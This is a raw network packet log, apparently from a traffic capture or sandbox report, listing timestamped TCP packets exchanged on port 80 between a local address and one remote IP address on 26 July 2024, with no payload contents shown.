Jul 26, 2024 18:56:48.604686975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.604691982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604705095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604715109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.604717970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604729891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604737043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.604742050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604753971 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.604754925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604768038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604779005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604780912 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.604795933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.604809999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.605638981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.605649948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.605683088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.605688095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.605695963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.605705023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.605715990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.605726957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.605727911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.605737925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.605740070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.605751991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.605753899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.605762959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.605776072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.605782986 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.605787992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.605801105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.605801105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.605812073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.605823994 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.605824947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.605837107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.605846882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.605848074 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.605865002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.605865002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.605887890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.605911016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.606653929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.606666088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.606676102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.606687069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.606698036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.606699944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.606715918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.606724977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.606728077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.606739998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.606748104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.606751919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.606764078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.606775045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.606777906 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.606786966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.606797934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.606800079 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.606812000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.606813908 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.606825113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.606836081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.606839895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.606848955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.606859922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.606863976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.606874943 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.606899977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.607561111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.607572079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.607582092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.607592106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.607603073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.607604027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.607614994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.607626915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.607630014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.607637882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.607649088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.607652903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.607660055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.607670069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.607671976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.607685089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.607686996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.607696056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.607707024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.607709885 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.607718945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.607729912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.607733011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.607742071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.607748985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.607764006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.607786894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.608473063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.608489990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.608500957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.608514071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.608516932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.608525991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.608531952 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.608544111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.608551979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.608556032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.608567953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.608578920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.608578920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.608592987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.608603954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.608611107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.608614922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.608624935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.608625889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.608638048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.608645916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.608649969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.608659029 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.608663082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.608675003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.608685017 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.608710051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.609383106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.609394073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.609404087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.609415054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.609425068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.609431028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.609437943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.609447956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.609450102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.609462023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.609464884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.609476089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.609487057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.609487057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.609500885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.609510899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.609512091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.609523058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.609525919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.609534025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.609544992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.609550953 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.609555960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.609568119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.609577894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.609594107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.610335112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.610346079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.610356092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.610368013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.610378027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.610380888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.610388994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.610390902 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.610400915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.610413074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.610418081 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.610424042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.610435009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.610438108 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.610447884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.610451937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.610460043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.610469103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.610476017 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.610482931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.610496044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.610502958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.610507965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.610522032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.610527039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.610538960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.610547066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.610570908 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.611249924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.611262083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.611270905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.611282110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.611291885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.611294985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.611304045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.611315966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.611326933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.611327887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.611341953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.611352921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.611356974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.611365080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.611372948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.611377001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.611387968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.611390114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.611402035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.611412048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.611413956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.611423969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.611435890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.611439943 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.611449957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.611458063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.611485004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.612114906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.612127066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.612138033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.612148046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.612159014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.612168074 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.612171888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.612179995 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.612184048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.612195969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.612196922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.612209082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.612222910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.612243891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.618740082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.618751049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.618757963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.618846893 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.618886948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.618896961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.618922949 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.618940115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.618952036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.618974924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.619002104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.619369030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.619395971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.619406939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.619417906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.619430065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.619435072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.619442940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.619453907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.619460106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.619467020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.619476080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.619481087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.619493961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.619515896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.620521069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.620532036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.620543003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.620553970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.620564938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.620570898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.620575905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.620588064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.620588064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.620600939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.620605946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.620614052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.620623112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.620628119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.620650053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.620672941 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.621227026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.621238947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.621248960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.621260881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.621272087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.621273994 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.621284008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.621295929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.621298075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.621308088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.621315956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.621319056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.621330976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.621331930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.621340990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.621352911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.621357918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.621366024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.621377945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.621380091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.621388912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.621398926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.621414900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.621438026 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.622126102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.622138023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.622148037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.622159004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.622174025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.622175932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.622186899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.622199059 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.622199059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.622210979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.622214079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.622226954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.622236967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.622240067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.622251987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.622262001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.622262955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.622275114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.622278929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.622293949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.622303009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.622329950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.623084068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.623095989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.623106003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.623117924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.623128891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.623131037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.623143911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.623147964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.623157024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.623164892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.623169899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.623182058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.623188972 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.623193979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.623207092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.623214960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.623218060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.623229027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.623229027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.623241901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.623253107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.623253107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.623281002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.623291016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.624100924 CEST	80	49757	147.45.44.104	192.168.2.4
